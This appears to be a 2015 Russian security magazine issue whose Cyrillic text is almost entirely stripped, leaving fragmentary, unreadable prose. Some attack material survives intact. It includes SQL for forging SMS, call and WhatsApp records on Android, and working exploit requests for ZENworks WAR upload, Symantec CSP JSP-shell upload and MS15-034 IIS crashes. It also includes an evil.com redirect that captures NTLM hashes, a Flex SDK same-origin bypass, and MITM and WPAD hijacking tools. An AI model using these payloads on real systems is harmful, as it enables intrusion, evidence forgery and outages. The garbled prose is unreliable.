> INSERT INTO sms (thread_id, address, date, read, type, body) VALUES (7, 900, strftime ('%s', 'now')*1000, 1, 1, "_")

strftime('%s','now')*1000-.UNIXtime. .2. -

. +7123456789, ,- (.).,- threads canonical_addresses. canonical_addresses,.

> INSERT INTO canonical_addresses (address) SELECT '+7123456789' WHERE NOT EXISTS (SELECT 1 FROM canonical_addresses WHERE address = '+7123456789')

/ threads.recipient_ids-_id,canonical_addresses,.

> INSERT INTO threads (message_count, recipient_ids, read) SELECT 1, MAX(_id)+1, 0 from threads

thread_id,recipient_ids,-recipient_idsthreads1(MAX(_id)+1).

> INSERT INTO sms(thread_id, address, date, read, type, body) SELECT max(_id), "+7123456789", strftime('%s', 'now')*1000, 0, 1, '_' from threads

-..

,-.Proofofconcept:

VariableQuerry. :-

/,/-(1/2),.

-canonical_addresses..UNIXtime.-%Time0.

,.

-ScriptRunShellRoot:

$ system/xbin/sqlite3 /data/data/com.google. android.providers.telephony/databases/mmssms. db " INSERT INTO sms(thread_id, address, date, read, type, body) VALUES (7, 900, strftime('%s', 'now')*1000, 1, 1, "_")";

contacts2.db /data/data/com.android.providers.contacts/databases/.

,--.accounts (, facebook,vk, whatsapp, viber). , .

, - -. , . ()62015,10:23 0 0 (. contacts2.db).

calls , ( 364) , , -,.UNIXtime,-,2-.. (. ):

> UPDATE calls SET date = 1430829536000, duration = 1524 WHERE _id = 364

,.,,,SQLite-. telephony.db,,

,S-..-,(com.android.telephony).

barcode_scanner_history.db-BarcodeScanner/-(goo.gl/eWAiom).,---(com.google.zxing.client.android).

btopp.dbBluetooth,-MAC(com.android.bluetooth).

calendar.db(com.android.providers.calendar).

external.db internal.db,/sdcard,:system,data(com.android.providers.media).

google_analytics,GoogleAnalytics. keep.dbGoogleKeep.191,,

,Pebble,(com.google.android.keep).

mail.db.(ru.yandex.mail). music.db,/-GooglePlayMusic(

com.google.android.music). reminders.db,GoogleNow.

,GooglePlay(com.google.android.gms).

user_dict.db().-(com.android.providers.userdictionary).

viber_messages.db(com.viber.voip).

threads_db2.dbcontacts_db2.db Facebook(com.facebook.katana).

vk.db.,,.,,vk.com/idXXXX.,-(com.vkontakte.android).

06 /197/ 2015 SQLite 47

(. contacts2.db)- , ().-.-:

> INSERT INTO calls(number, date, duration, type) VALUES ("+71234567890", strftime('%s', 'now')*1000, 89, 1)

(.),. -

contacts2.db

-

06 /197/ 2015X-Mobile48

INFO

demosfenus SQL-

.

-

WhatsApp

,. ( ),dialer.db.

,-,-, . .

msgstore.dbWhatsApp,/data/data/com.whatsapp/databases. chat_list -,threads-. messagesdata.wa.db. , WhatsApp .messagesSQL-:

> UPDATE messages SET data = "_" WHERE _id = ___

WhatsApp.,-.

settings.db/data/data/com.android.providers.settings-, . -.-, -. ,.:global,systemsecure.. adb_enabledUSB. airplane_mode_radios

,-.

always_finish_activities(activities),.

usb_mass_storage_enabledUSB-.

wifi_sleep_policyWi-Fi-().

wifi_watchdog_on/Wi-FiWatchdog().

bluetooth_discoverability_timeout-Bluetooth.

end_button_behavior,.

font_scale. setup_wizard_has_run

/-.

android_id ,64-(hex-),-.

location_mode skip_first_use_hints1,-

status_bar_show_battery_percent-.

audio_safe_volume_state-.

bugreport_in_power_menu-.

( API) developer.

android.com(goo.gl/WTsf9v).-settingscontent.-,(si -):

$ adb shell content insert --uri content: //settings/system --bind name:s:status_bar_ show_battery_percent --bind value:i:1

-c4.4+.(goo.gl/SH9zeP).,,1,0, .

, -/ . -lockscreen.password_typelock_pattern_autolock./data/system/locksettings.db.

,-. -, , , . - , , ,. / , -(5.0), , ,adbpull,,- 1520. - , , , -.

06 /197/ 2015 SQLite 49

. , -. ,, 3,74 (,Apple).

, , , Android(iOS)- . lowend Mediatek,,---.

Defy- . -, 1 , - (, , ), . Defy -Nexus4,,(1500- 2100 ). ,,,- NFC , -.

, - , , - .,Feedly, , . Defy-.,Android4.0/5.0, HTML .

, FeedMe, Java, -. ,- -,,.

-Android-,-.,-.MotorolaDefy,,-,,-iPhone.,--,,--,20082009.

OperaMini, , . OsmAnd(OpenStreetMap),-GhostCommander, --Twidere,.-,,-,.

GooGle Google, , ,,--.Google- , , .

- . - , .:GooglePlay,GmailGoogleKeep. , , , ? ,,?,-,,,-?.

, - gapps-pico, GooglePlayGoogleServicesFramework,- Google . - . - 1Mobile Market GooglePlay,Gmail,-Gmail (,,Inbox).

, --,., , - - Linux 2.4. KDE3, - - , KDE5,.,BeOS,- - . ,, . MeeGo Linux Nokia N900.,,,iOS. -, iPhone4, , -.,.

,:MotorolaDefy , - Motorola Droid II TI OMAP 3 1,2 (1),512-

,3,7-,-Android2.1. -,- - low low end. CyanogenMod 11 , (,Defy-,- kexec ). ,-DefyNexus4.,.

3,74.60, , -. -, ,-(Nexus4GalaxyNexus)-.

,- , ,,.

androidstreet.net

06 /197/ 2015X-Mobile50

APK #8.

AndroguArd Apktool (goo.gl/LdB4V7) / -, Androguard (goo.gl/bdBlRu) - . , Androguard Python-, - . Androapkinfo , androdd , androdiff , , androlyze DEX- . .

Androguard , - , , , - . , - , - - -, , VirusTotal, Google.

SmAlideASmalidea (goo.gl/EWmB1z) IDEA / Android Studio, - , smali. . backsmali (goo.gl/ikzOQS) APK-, - Android Studio, DEX .

smali, -, - , , ART, Dalvik Android 5.0. - smali- , Android- .

SimPlify , -. , - . , Simplify (goo.gl/ff0cNm) . Simplify , , - smali- , , , , , .

, Simplify - , - / .

, ! , . . , , . , : - , IDEA- smali- , Android- Sony Mobile. , , - .

APKAnAlyzer Apktool Angroguard , ApkAnalyzer (goo.gl/byFUq) Sony Mobile . Java- , -- . - APK-, smali-, (, ).

: /

; XML- -

; -

; logcat; ODEX ; ; (

ELF-).

, , , Java- JD-GUI (jd.benow.ca) APK Studio (apkstudio.codeplex.com), / APK- , Java-.

ApkAnalyzer

-

Smalidea

06 /197/ 2015 51

Easy Hack

GreenDog , Digital [email protected],twitter.com/antyurin

ViewState aSP.Net , Easy Hack - Microsoft. , ASP.NET. , - OWASP top 10 (SQLi, CSRF, XSS ) , , - .

ASP.NET ViewState. . - . - ASP.NET. , - . -

WARNING

- . ,

, -

.

06 /197/ 201552

postback. , ( URL), . ViewState. - . - ViewState , .

ViewState Base64 - , (__VIEWSTATE).

ViewState. -, reflected XSS. XSS Auditor - Base64, - ViewState . -, , -. , .

ViewState, Microsoft MAC (Message Authentication Code). , , . , - Base64 . ViewState - , , , , .

, . , MAC . - , MAC . -, . -, , . - , - -. -, - .

, MAC, Base64 . , , MAC , , .

Burp Proxy Response ViewState. (. ) , MAC.

ViewState

XXe JSON, - XXE - . XXE 2000-, ( Server Side Request Forgery). XXE - .

XXE , XML - Document Type Definition (DTD) - (inline DTD), -. , , , libxml,

(PHP, Python, Perl), inline DTD.

, , - , , - .

, NetSPI (goo.gl/ol9GAq), XXE.

, - (web service). , - -. . ( HTML), - .

- , - . - . . , , , , REST, SOAP, XML JSON. (endpoints) , (/webservice/json, /webservice/soap ).

NetSPI , - - , Content-Type. - endpoint JSON, Content-Type: application/xml, XML, , XXE. -, .

- XML, - . JSON :

{"search":"name","value":"netspitest"}

XML :

namenetspitest

- . , . Content-Type, XML

06 /197/ 2015 Easy Hack 53

proof of concept, . - C dummy, .

: , , . UAC , , , -.

, Windows. !

-, . -, - WebDAV SMB. , , - . , MS08-68 . , , , , , HTTP, SMB.

-, NTLM Relay , - SYSTEM , - . , , , .

Microsoft, , - -. SMB, - . , , .

wiNdOwS NtLM-

HttP SMB

, NTLM-. , - Microsoft, , . -.

. Windows NTLM, challenge-response:1. .2. (challenge).3. challenge ( NT-

, ) .4. .

, .

, - . relay-. , , .

, NTLMv2, , -, . , NTLM , HTTP, Telnet, POP3, FTP, SMB .

Windows. , -. SMB HTTP. UNC- (, \\evil\test), 445- (SMB) - , evil .

- SMB Relay. , . , , , RCE. MS08-68.

- . - NTLM- (goo.gl/AQbSNM).

.1. WebDAV ( HTTP)

NTLM. 1024, , .

2. ( NT AUTHORITY\SYSTEM) WebDAV (\\127.0.0.1:8080\test.txt).

3. , - .

4. .5. -! .

$IPC ( ).

WebDAV , SMB. WebDAV , - UNC- (\\127.0.0.1:8080\test.txt). - WebDAV Windows , (Windows 7, 8 8.1) , WebDAV. , - .

Windows Defender. SYSTEM. Windows, , , .

WebDAV ,

SYSTEM

Windows WebDAV

NTLM- ( NTLM). white paper (goo.gl/Q1Uz5A), - - .

NTLM- NTLM-. , , ,

06 /197/ 201554

SOP SwF FLeX SdK data="https://victim.com/badflex.swf ">

2. , victim.com .

3. , , victim.com, Flash, http://evil.com/sender.swf.

4. Flash , sender.swf, ( victim.com) evil.com, crossdomain.xml.

5. crossdomain.xml victim.com, - sender.swf.

6. sender.swf victim.com.7. sender.swf

victim.com . SOP , sender.swf victim.com.

, - , CSRF .

, , swf. ParrotNG, , Burp, SWF.

. UNC- SMB, HTTP. , - Intranet. , , - , . , http://evil/ Intranet, http://evil.com/ Internet. , - NTLM-, ( , , ). - NTLM-, , . IP- - Internet ( ).

. ( ), - , IE.

- , - HTTP. , man-in-the-middle . . , -.

. , - antivir.ru. antivir.ru NTLM-, , Internet. - http://evil/ .

. , - SMB. HTTP , NTLM.

:

HTTP/1.1 302 FoundContent-Type: text/htmlLocation: file://evil.com/ntlm_catcher

, - API, .

, , , , , . , , , MS . .

Flash crossdomain.xml, , - SOP (Same-origin policy). SOP Flash. Troopers 2015 Minded Security NibbleSec (goo.gl/JRBwJ4).

Troopers, . - SOP Flash? , Adobe , , - . , -, .

, , Flash , crossdomain.xml . . - .

Flex SDK, - Flash. 3.1 - (). . - flashvars (-, - ) resourceModuleURLs. , - , . . , - - , .

, Flash, Flex SDK , -, SDK -. -, Flex SDK, .

, , , , - Flex SDK, , 4.5.1. , , , . , - , - - , Google. , , Flex SDK.

. , victim.com, - (badflex.swf), - Flex SDK. evil.com - - (sender.swf), victim.com, crossdomain.xml - victim.com.1. evil.com, -

victim.com. - resourceModuleURLs. - :

Novell ZeNworks CVSSv2: N/A : 8 2015 : Pedro Ribeiro CVE: 2015-0779

Novell ZENworks Configuration Management (ZCM, ZENworks Suite). UploadServlet - uid (../). WAR- Tomcat -. WAR Web Archive Web Application Archive,

Java -. , . , - http.sys.

, , - - Java- JAR ZIP. WAR:

/index.html/guestbook.jsp/images/logo.png/WEB-INF/web.xml/WEB-INF/classes/org/wikipedia/Util.class/WEB-INF/classes/org/wikipedia/MainServlet.class/WEB-INF/lib/util.jar/META-INF/MANIFEST.MF

EXPLOIT : WAR-, :

dukeBarman [email protected],

@dukebarman, dukebarman.pro

06 /197/ 201556

POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war

Metasploit.

msf exploit(zenworks_configuration_management_upload) > rexploit

ZCM. , ZDI-10-078/OSVDB-63412, .

TARGETSZENworks Configuration Management 0) agentName = filename.substring(24, index); else agentName = filename.substring(24); String date = mFormat.format(mParser.parse (filename.substring(0, 8))); String parentFolder = (new StringBuilder()). append(SisProperties.getBulkLogDir()).append(FILE_SEP). append(agentName).append(FILE_SEP).append(date).toString(); File parent = new File(parentFolder); if(!parent.isDirectory()) parent.delete(); parent.mkdirs(); file = new File(parentFolder, filename); return file; Throwable th; th; throw new IllegalArgumentException((new StringBuilder()). append("Corrupted bulk log filename [").append(filename). append("]!!").toString(), th);}...

, 24- . - filename . - (), :

06 /197/ 2015 57

LOG_ROOT/AGENT_NAME/FORMATTED_DATE

parent.mkdirs(). - .

EXPLOIT . , /register, GUID,

. YYYY-MM-DD/YYYYMMDD,

YYYYMMDD YYYY-MM-DD . , . - .

servlet : YYYYMMDD/../../../././././PATH_FROM_TOMCAT. - JSP-.

( , ) - (bit.ly/1IotJe3) . . - , :

...19991111est3X1999-11-11/19991111/

.4test5test6.jsp

:

...19991111/../../../././././tomcat/symapps/agent/sis-agent/jspshellS2.jsp

. -:

req1="""POST /sis-agent/"""+action+""" HTTP/1.1Host: """+host+"""Accept: */*Appfire-Format-Version: 1.0Content-Type: application/x-appfireAppFire-Charset: UTF-8AppFire-GUID: """+guid+"""Content-Length: """+str(len(body))+"""

action bulk-log; guid GUID ; str(len(body)) .

(Properties):

headers="Data-Format=text/plain\x0aData-Type=properties\x0aData-Length=%d\x0a\x0a" % (len(properties))

:

"file.name":__

JSP-

JSP-

:

headers="Data-Format=binary/zip\x0aData-Type=policy\x0aData-Length=%d\x0a\x0a" % (len(bin))

JSP- Metasploit. , jspshell.jsp. update.py.

, , . -, SCSP , - . - - .

- , (bit.ly/1IVLQan).

TARGETSSymantec Critical System Protection Server

IIS

Range Length

-

-

Range

HTTP-

HTTP-

TcpSegment

1. HTTP-

2.

Range

3. Range Tail

4.

5.

. .

, Range Length 284 0xFFFFFFFFFFFFFEE4. , .

HTTP- UlAdjustRangesToContentSize(). Range, . -, , Range - . -.

0xFFFFFFFFFFFFFFFF 0xFFFFFFFFFFFFFFFF >= >=

. - Range (. ).

284, 0xFFFFFFFFFFFFFEE4, . .

, -. , , UxpTpDirectTransmit(), . .

, :

Range Count = 1;Range Boundary and Range Info length = 0;Range Tail Boundary Length = 0;Range Length = 0xFFFFFEE4;HTTP Head Length = 283;

, 0xFFFFFFFF (4G). , . , - . 284 .

HTTP Response Length = HTTP Head Length + (Range End Position Range Start Position + 1)= HTTP Head Length + (0xFFFFFFFF Range Start Position + 1= HTTP Head Length - Range Start Position

Range Start Position HTTP , . , HTTP Response Length HTTP Head Length.

DoS, , HTTP Content Length . Range Start Position - HTTP Head Length + 1 . HTTP Content Length DoS-.

HTTP- , http.sys - . TcpSegmentTcbSend() tcpip.sys . (. ).

15 . HTTP Response Length 0xFFFFFFFF. Virtual address -

06 /197/ 2015 59

EXPLOIT ( ):

GET / HTTP/1.1Host: site.comRange: bytes=0-18446744073709551615

- : (bit.ly/1KvJDRc); Python (bit.ly/1cjO8mC).

:

curl -v SERVER_IP -H "Host: anything" -H"Range: bytes=0-18446744073709551615"

-, bash . , - :).

ITW- - . ( ESET):

GET /%7Bwelcome.png HTTP/1.1User-Agent: Wget/1.13.4 (linux-gnu)Accept: */*Host: [server-ip]Connection: Keep-AliveRange: bytes=18-18446744073709551615

TARGETSWindows- MS15-034.

SOLUTION .

7.

PHP

(>=0x80000000). HTTP Response Length - , . virtual address . partial memory descriptor list (MDL) (bit.ly/1zODcs4). , BSOD.

-.

GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615, 1-600"+ "\r\n\r\n"

(Range): Range1: 318 446 744 073 709 551 615; Range2: 1600.

UlpParseRange() :

Range1 Length = 0xFFFFFFFFFFFFFFFF - 0x3 + 1 = 0xFFFFFFFFFFFFFFFDRange2 Length = 600 -1 + 1 = 600

HTTP UlAdjustRangesToContentSize(). Range1 (3 + 0xFFFFFFFFFFFFFFFD => 0) , . Range2, , .

, - UxpTpDirectTransmit().

Range Count = 2Range1 Length = 0xFFFFFFFFFFFFFFFDRange2 Length = 600Http Head Length= 0x127 // HTTP head content, 1Range1 Boundary and Range1 Info length = 0x7aRange2 Boundary and Range2 Info length = 0x69Range Tail Boundary Length = 0x32; // 3

Range, (boundary) (Content-Type, Content-Range) Range ( 2).

HTTP- , :

HTTP Response Length = HTTP Head Length + Range Boundary and RangeInfo length + Range1 Length + Range Boundary Range Info length + Range2 Length = 0x127+7a+0xFFFFFFFD+0x69+0x258+0x32 => 0x491

- 0xFFFFFFFD. - 0x491 HTTP-. .

tcpip.sys . HTTP-. 0x491. , 0xFFFFFFFD ( 7). Length - Remain Length 0x2f0 (0x491 0x172 0x7a). : [0x3, 0x3 + 0x2f0]. - 0x2b6. .

, . - :

GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3- 18446744073709551615,1-32,32-64,64-96,96-128,128-256, 129-130,130-140,160-170,180-190, 190-200" + "\r\n\r\n"

- BSOD, - . - .

6. -

WARNING

-

. , -

, -

.

06 /197/ 201560

Tor:

@difezza, defec.ru

entavio@sh

uttersto

ck.com

,

06 /197/ 2015 61Tor:

,-,.- , ,, , ,,DreadPirateRoberts.

SilkRoad(20112013)Tor15,--.,200-.

2013 ,, -,.- .

- , -:,- . , , SilkRoad-.-, .

, , 400 onion- -,-SilkRoad2.0.

, -,-.,onion-,Tor , -, -.-,-.

2016 - (Nick Bilton), ,, . , - ,,-.Wired(www.wired.com/2015/04/silk-road-1), -.

Onymous, - (European Cybercrime Centre, EC3), , - (the U. S. Immigration and CustomsEnforcement,ICE),-(HomelandSecurityInvestigations,HSI)(Eurojust), 17, - ,410. : https://www.europol.europa.eu/content/global-action-against-dark-markets-tor-network.

Silk Road

onymouS

Silk Road

Onymous onion-

Tor, -

,

Silk Road

Silk Road.

Tor

?Tor?,,.,-,.,,-!?,.

06 /197/ 201562

, , -,,.

, - Tor -.-:().

, -? NSA ,Firefox,TorBrowser.,-NSA,-,-.

( , ?) , -,- . , , Flash , -.TorBrowser-,Flash-.

, -HTML5,-, , , - . WebRTC, -HTML5,Flash IP-.STUN-, WebRTC, - Tor -.TorBrowser.

Tor-,, , -,PoC., , ,-.

- , -NetFlow(www.cs.columbia.edu/~sc2516/papers/pam2014-tor-nfattack.pdf). -,- NetFlow- ,Tor . NetFlow- -: ; ; ; ; ; ; ; IP; TypeofService; TCP--

; ; .

,,-,

NSA -

Tor

Flash

IP-

Tor-

-NSA, - Tor-, -:

https://www.schneier.com/blog/archives/2013/10/how_the_nsa_att.html,

www.theguardian.com/world/interactive/2013/oct/04/egotistical-giraffe-nsa-tor-document.

nSa

WARNING

- - . , - , -

.

06 /197/ 2015 Tor: 63

Tor-.- -, . -Tor-,.

, -190,-Tor.-,.

Tor,,- , .exit--,,onion-.-onion-,HTTP/HTTPS- Tor-, -.

, HTTP-.-Referer,URL.- , --.

,-onion,.-,-,.

-,-.,.

,-,exit-,LeviathanSecurity.,-. - , Tor,-exit-nodeMITM--.

- , ( ) - , .

HTML5canvas,-JavaScript.-.-: (TorBrowser,-

);

-;

-.

,-, JavaScript- measu-reText().

,-TorBrowser,, . Tor Browser , --.

Tor-, , -

-

measureText() -

,

Tor

-

-

,

128

06 /197/ 201564

POST--, -,,.

? JS- -: Exit-node.MITM-,JS-

-,.

onion--,.,-.

XSS(,-)-.

. - 100 onion- ()falsepositive,,30%--.

, -, - . - , -JS--.,,c2c91d5b3c4fecd9109afe0esdfsdfsdfdrugs.onion(), gunsdfsdf.onion ( ),linkedin.com/vasya.:.

?-,onion-. , : JavaScript? , TorBrowser,JS.

, --.

- : - ( , - ), ( IT-). (ContentDeliveryNetwork,CDN),-128Tor-(CDN,).

, JavaScript,measureText()--.

-. -.

JavaScript,

fingerprint

-

, -

Tor Browser

,

Tor-

-

Tor-

, :

JavaScript -

? ,

Tor Browser,

JS

ONION ONION

ONION ONION

EXIT NODE EXIT NODE

= =

= =

XSS XSS

DOORWAY DOORWAY

INJECT INJECTWWW WWW

XSS XSS

06 /197/ 2015 Tor: 65

,-EMC-RSAConference2015,--CheckPoint.-,--,.-,:-,--.

RSA ConfeRenCe

IT-

2015

06 /197/ 201566

- , , , -

,. ,, . , - ? -???, 20 Moscone center,-, -RSA Conference 2015, -,--.

, - ,-.- -. - .-:, ( ,,-),,,.

,--. , -. - RSA, - ,,,, , ,,,-.

. Microsoft , , ,

,,,--,,-..

, , -.(-),-,, . - -.-,:-...

( !) (-).

- . - , Symantec TrendMicro Cisco Fortinet (-, - ), , , ,-.,,-.

(keynotes,,,, ),-. ( ), ( ) - --. -, (!),-.:,-,.

[email protected]

06 /197/ 2015 RSA Conference 2015 67

1.Dr.APT, ( Android), ( CAIQ,),-,.,-keynotes., -.

,-NFC (GoogleWalletApplePay)--,,:-.

:goo.gl/yf1TXL

,.62!- : 48% --,40%. , -(!). Improperly Validated SSL -,.,-, ,.

:goo.gl/ft1e3L

,2014,(-?:https://xakep.ru/2015/04/09/195-exploit-packs/), . MS Office ,CVE-2012-0158!

:goo.gl/1Nb6lN

-Yes,IaminRU, , . , (517) , .,,,() , - . (), ,,,-,-:,, , -.,-,.-, - BBS. ,BBS-, . (--),,-,65%814.

!

68 06/197/2015

SAPASE,? SQL/RPC- .-Java.

:goo.gl/b5eDZu

(https://xakep.ru/2014/09/08/password-manager-pentest/).,,(ZhiweiLi).-.,-.:CSRF(LastPass,RoboForm,NeedMyPassword)XSS(NeedMyPassword).

:goo.gl/H4TM2q

,

, will

hack for food

,

-

,

-

. ,

-

, , ,-.-IT-,:).

,-,RC2,RC4,RC5,.RSA.-,-.

, , RSA.

, - --,,.- .

. , - Windows, Microsoft. - - Microsoft Windows, SysinternalsProcessExplorerRootkitRevealer.,:https://xakep.ru/2009/05/12/48169/.

, Blowfish, -.SchneieronSecurity:DataandGoliath,-.

06 /197/ 2015 RSA Conference 2015 69

2. Moscone- . full pass, -, , , 2100 ,., ,-.(-).

.,,-. , ,--.

,-(!), . , :, . . -, . , ,,, 70% -.

IoT (Internet of Things) CCTV- -RomPager,-

INFO

- - Wi-Fi, . - , ,

Wireshark,

,

:).

-2012., , (https://xakep.ru/2012/12/30/kris-kasperski/), . , (,-,,,:).. .).

McAfee. , , ,McAfee,,,-:).

-.

!, (),-SpartanRifleLWRC,. -(),.

CheckPoint,-(;)),.,!

, 70%

06 /197/ 201570

, .

(POS) , . , - , PHP-,(), , .:,,.-,...

()-. . -:201337%,,201545%.-.5%,,-.,..-,.IT.

, . . ,,.

, ,,,,.

,( ). (top-ratedspeaker), . , . - SysinternalsTools, ,.-,2009-ProcessExplorer(,proofofconcept,).(- , - , , . , ).,--2012(blogs.technet.com/b/markrussinovich/archive/2012/01/05/3473797.aspx) RSA 2015-.-,,(), -.,ProcMon, ProcMon -,XML-,.-/.

.,-Kill,-. . ,.- suspend. , -.,--.Kill.,Windows10,,,.

, . ,, - . - , , -., , .

INFO

216

4.

-

,

,

Asus Eee

PC 1001px. -

-

... , -

windows XP!

, 2009 Process Explorer

. - , -, . , , , - . , . , , . , .

-, - - . , , , , , .

() - , -. - . - - - , .

(Active Directory, Lotus Domino, LDAP, Novell ).

(penetration testing) - . - , - , - . - , , , .

,

- , . . . , , - . - , - , 60 .

. - - , (, Active Directory). - -. - , . , , -, SNMP, RW. -, Oracle !

, .

. ,

white hat, , - -, ,

X@ygoltsev

Intro - , . , , , -, , . ( ) : , , . , - , . , Offensive Security -

06 /197/ 201572

, , - .

-, , . - - . , - Active Directory, , , - . , ( AES), , , - (j.mp/NCrOZU). , , - .

Active Directory, Windows.

- . , - .

WIndoWs Windows - Active Directory. - , , (, SMB Relay) (, mimikatz). , Domain Admins .

Windows.

- , - , . . , .

Web Proxy Auto dIscovery Internet Explorer. , , , - wpad.domain.name. . WPAD .

WPAD DNS, , , , .

NBNS WPAD.

, , http://wpad/wpad.dat.

, - -. wpad.domain.name, , , , WPAD NBNS . MITM , , ARP Poisoning.

Windows.

, - ( WPAD). Active Directory. -: User configuration Windows Settings Internet Explorer Maintenance Connection Automatic Browser Configuration Automatically detect configuration setting. .

/ , - , - , Hack.Tool. . .

Windows.

- -, - .

, . , , . , - , . . , . , , - - , - .

.

-. , - , . IP-, . , - .

-. .

Windows UNIx.

. - , . , - .

outro , , - , . - - , - . -, .

Vulnerability Assessment

(bit.ly/17lVCDU) Open Source Security Testing

Methodology Manual (bit.ly/U9WpQY) The Penetration Testing Execution

Standard (bit.ly/1KNe7iF)

PentesterLab (bit.ly/1uJ3RUu) Penetration Testing Practice Lab

(bit.ly/1fb61kO)

Open Penetration Testing Bookmarks

Collection (bit.ly/1vncteH)

, Active Directory (bit.ly/1cezrBb)

WPAD Man in the Middle (bit.ly/1InN9OL)

06 /197/ 2015 , 73

MITMf(goo.gl/LdxWWY) . - man-in-the-middle , sergio-proxy. Kali Linux. - (goo.gl/LdxWWY) :

# setup.sh# pip install -r requirements.txt

. : Spoof -

ARP/DHCP-, ICMP-;

Sniffer - ;

BeEFAutorun BeEF, ;

AppCachePoison ;

SessionHijacking - ;

BrowserProfiler ;

FilePwn HTTP - Backdoor Factory BDFProxy;

Inject HTML-; jskeylogger JavaScript- .

, , .

-. .

, - , . -

. -,

, MITM-.

MITM-

ant [email protected], @svv00p

Oleg Golovn

ev@

shuttersto

ck.com

ARP spoofing MITMf

WARNING

- - . , - , -

.

06 /197/ 201574

PuttyRider

PuttyRider

PuTTyRIdeR (goo.gl/xZpsbV) . , - -, -. , , - - Linux/UNIX-, SSH/Telnet/rlogin. - , . , PuTTY - . ( ), shell- . (). , - PuTTY, - (goo.gl/5MQdzW).

Sessionthief

sessIonThIef (goo.gl/VP51xA) , . . - ( - ) ARP poisoning. - , , , , Yahoo Facebook, SSL-, . , - , SSL, - . , Firefox - . - , :

# apt-get install build-essential libwxgtk2.8-dev libgtk2.0-dev libpcap-dev # g++ $(wx-config --cppflags --libs) -lpcap -o sessionthief *.cpp# setcap cap_net_raw,cap_net_admin=eip sessionthief

dsnIff(goo.gl/umyYJW)Dsniff , , - , , , : -/, . : arpspoof , ; dnsspoof arpspoof DNS-

DNS- ; dsniff (password sniffer), -

, Telnet, FTP, SMTP, POP (Post Office Protocol), IMAP (Internet Message Access Protocol), HTTP, CVS, Citrix, SMB (Server Message Block), Oracle ;

filesnarf tcpdump NFS-;

macof MAC- , , -, , dsniff ;

sshmitm SSH-, , .

. , . , -, -. Dsniff

06 /197/ 2015 75

MITMPRoxy(goo.gl/ISdbbM) , - HTTP-. /, -, , , -. , - . mitmproxy REST API, .

:

$ sudo aptitude install mitmproxy

$ pip install mitmproxy

$ easy_install mitmproxy

, mitmproxy HTTPS-, . , , - : goo.gl/FLcaiS.

Intercepter-NG

InTeRcePTeR-nG(goo.gl/r9n2jz) , . , ( - ) - . -, MITM, -, . - . -, , . -, - , , nix- - (, , Wine GUI). - MITM. . ARP poison. ( DNS/NBNS/LLMNR). DNS over ICMP Redirect, ICMP Redirect. DHCP MITM, SSL MITM + SSLStrip, WPAD, HTTP Injection, SSH-MITM. , - Windows , MITM (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection) . . , , .

Mitmproxy

PRoxyfuzz (goo.gl/C9B0AY) MITM- ProzyFuzz - . , - . , , - . TCP UDP. , . , -- ( ) PoC. :

python proxyfuzz -l -r -p [options]

: w ,

; c ( ); s ( ); u UDP- ( TCP).

The MIddleR(goo.gl/Gf3AlT) DEF CON - MITM- . - - HTTP : plugin-beef.py Browser Exploitation Framework (BeEF)

HTTP-, ; plugin-metasploit.py (HTTP)

IFRAME, Metasploit;

plugin-keylogger.py JavaScript onKeyPress , - HTTPS, , .

The Middler , - , . - - ( ), . : scapy, libpcap, readline, libdnet, python-netfilter. , , - .

06 /197/ 201576

eTTeRcaP(goo.gl/DF9xJ4) , - , MITM-. - , , - . - , - - . ][, : goo.gl/0CpUko.

Subterfuge

subTeRfuGe(goo.gl/0VKemE) Windows - MITM-, Intercepter-NG: , . , - Windows Linux MITM- (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection). nix- . MITM - (, Ettercap, Arpspoof, SSLStrip), . Subterfuge, , , DEF CON 20. , : SubterfugePublicBeta5.0.tar.gz. -

tar -zxvf /root/Desktop/SubterfugePublicBeta5.0.tar.gz -C/root/Desktopcd /root/Desktop/subterfugepython install.py

, . , -, subterfuge, - 127.0.0.1. Start , Subterfuge , . , Settings. , -: Session Hijacking: ,

-; HTTP code injection: -

; Evilgrade: Evilgrade -

.

KaRMa (goo.gl/mEIHc3) , - . , KARMA , , -, 802.11 Probe Request , / . Evil Twin, MITM. - , -, -, , . , , , -, , AP, - . : , , - ? , - , . -, , WiFi Pineapple Mark IV. KARMA -: Pwnie Express, Kali Linux, Snoopy, Jasager.

aIRJacK(goo.gl/TM9niF) , , ( , ) 802.11 . - . , , AirJack , ( DoS- MITM-), - SSID .

Ettercap

Lenovo. Superfish, - -. , SSL- - . , Superfish Inc. - Superfish : MITM;

(SHA-1, 1024- RSA) ; ; -

; -; .

, - MITM-. , - .

SuperfiSh

In The end , , -, , , , - . , - MITM- , , - , . nix- . , , credentials. , :).

06 /197/ 2015 77

WPAD--.,,,-,-HTTPS-.

WPAD WPAD

@cdump, [email protected]

Panim

oni@

shuttersto

ck.com

06 /197/ 201578

PAC-,URL,-,.:

function FindProxyForURL(url, host) { if (host == "xakep.ru") {

return "PROXY proxy. com:8080"; } else if (host == "microsoft.com") { return "PROXY anotherproxy.com:5050"; } else { return "DIRECT"; }}

FindProxyForURL, PAC- - . , , -, -google.com proxy1.com, proxy2.com,- , --.

PAC-- - , Firefox - URL. - . -WPAD.

WPAD WPAD PAC- DHCP- ( ), HTTP- http://wpad.%domain%/wpad.dat. - wpad.dat -.

, DHCP,msk.office.work. WindowsXPwpad.msk.office.work ( -

WPAD(WebProxyAutoDiscoveryprotocol),-PAC(ProxyAutoConfig),JavaScript,-, URL. FindProxyForURL

. 1. , -

Windows XP

. 2. , -

Windows 7

1

2

WARNING

- - . , - , -

.

06 /197/ 2015 WPAD 79

DNS),wpad.office.work. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad.office.work/wpad.dat(DNS)

Windows7-:DNS- , WPADLink-Local Multicast Name Resolution,-NetBIOS Name Service.- , WindowsVista. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad/wpad.dat(LLMNR) http://wpad/wpad.dat(NBNS)

-, -. -NetBIOS,-NBNS-Metasploit(.3).

-,WINS-, Windows-WPAD,-WINS-.-: ,, /24, -IP.

861 . .com,.net,.ru,.org,-

.work.school.ninja.vodka.-domain-nameDHCP-.,domain-name .school-wpad.school,WPAD-.,wpad.TLD,(.4).

wpad.co, --wpad.dat. , : wpad.work. -3901IP.

Profit?,- -. ? HTTP-:-,,cookies,.

HTTPSCONNECT.-user-agent.-, , handshake,-.

